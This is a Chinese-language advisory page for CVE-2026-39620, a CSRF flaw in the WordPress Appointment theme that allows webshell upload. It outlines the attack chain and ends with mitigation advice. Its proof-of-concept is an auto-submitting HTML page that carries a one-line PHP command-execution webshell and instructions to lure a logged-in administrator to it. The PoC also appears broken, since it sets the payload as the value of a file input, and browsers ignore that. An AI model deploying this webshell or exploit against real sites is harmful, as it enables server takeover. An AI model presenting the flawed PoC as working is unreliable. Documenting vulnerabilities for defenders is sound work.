CVE-2026-39620 CVSS 9.6 严重

CVE-2026-39620 Appointment主题CSRF导致WebShell上传

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39620

漏洞类型

CSRF, 任意文件上传

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Appointment Theme

漏洞概述

该漏洞存在于priyanshumittal开发的WordPress Appointment主题中。由于缺乏有效的CSRF防护机制，攻击者可诱导管理员点击恶意链接，进而利用跨站请求伪造向服务器上传任意文件。此漏洞可能导致WebShell上传，使攻击者获得服务器控制权，影响范围涵盖3.5.5及以下版本，风险极高。

技术细节

该漏洞源于WordPress Appointment主题在处理文件上传请求时未实施充分的CSRF令牌验证。攻击者首先侦察目标站点是否使用了受影响版本的Appointment主题。随后，攻击者构造一个包含恶意HTML代码的页面，该页面自动向目标网站的文件上传接口发送POST请求，请求中包含伪装后的PHP Webshell。当已登录的管理员访问此页面时，浏览器会携带其有效的身份凭证（Cookie）执行该请求。服务器接收到请求后，误以为是管理员的合法操作，从而允许文件上传。一旦Webshell被成功上传至Web目录，攻击者即可通过HTTP请求访问该文件，在服务器端执行任意系统命令，造成严重的数据泄露或系统破坏。

攻击链分析

STEP 1

侦察

识别使用WordPress Appointment主题（<= 3.5.5）的目标网站。

STEP 2

武器化

构造包含恶意文件上传请求的CSRF HTML页面，载荷为PHP Webshell。

STEP 3

投递

诱导已登录的管理员访问包含恶意CSRF代码的链接。

STEP 4

利用

管理员浏览器自动发送上传请求，服务器保存Webshell文件。

STEP 5

安装

Webshell成功驻留在服务器Web目录中。

STEP 6

命令与控制

攻击者访问Webshell路径，执行系统命令获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC generated for CVE-2026-39620
Description: CSRF PoC to upload a PHP webshell.
Usage: Host this file and trick the admin into visiting it.
-->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://target-site/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="action" value="appointment_upload_action" />
  <input type="file" name="file" value="<?php system($_GET['cmd']); ?>" />
  <input type="submit" value="Submit" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

影响范围

WordPress Appointment Theme <= 3.5.5

防御指南

临时缓解措施

建议立即将主题升级至最新版本以修复此漏洞。若无法立即升级，应暂时禁用文件上传功能，或在Web服务器层面配置严格的访问控制策略，阻止对上传目录中脚本文件的直接执行，同时加强对管理员账户的安全教育，避免点击不明链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表